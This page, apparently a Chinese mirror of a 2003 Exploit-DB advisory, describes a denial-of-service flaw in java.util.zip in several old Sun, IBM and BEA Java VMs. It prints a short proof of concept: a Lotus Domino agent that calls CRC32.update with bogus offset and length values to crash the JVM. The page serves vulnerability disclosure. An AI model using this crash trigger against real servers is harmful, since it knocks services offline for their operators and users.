Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 – java.util.zip Null Value Denial of Service (3)

Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 – java.util.zip Null Value Denial of Service (3)

漏洞ID 1053758 漏洞类型
发布时间 2003-03-15 更新时间 2003-03-15
图片[1]-Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 – java.util.zip Null Value Denial of Service (3)-安全小百科CVE编号 N/A
图片[2]-Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 – java.util.zip Null Value Denial of Service (3)-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22360
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7109/info
  
Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class.
  
The methods can be called with certain types of parameters however, there does not appear to be proper checks to see whether the parameters are NULL values. When these native methods are called with NULL values, this will cause the JVM to reach an undefined state which will cause it to behave in an unpredictable manner and possibly crash.

import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {

        public void NotesMain() {

                try {
                        Session session = getSession();
                        AgentContext agentContext =
session.getAgentContext();
                         CRC32 crc32 = new CRC32();
        crc32.update(new byte[0], 4, 0x7ffffffc);

                        // (Your code goes here)

                } catch(Exception e) {
                        e.printStackTrace();
                }
        }
}

相关推荐: SmoothWall Encrypted Password Hash World Read Vulnerability

SmoothWall Encrypted Password Hash World Read Vulnerability 漏洞ID 1102619 漏洞类型 Configuration Error 发布时间 2002-01-15 更新时间 2002-01-15 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享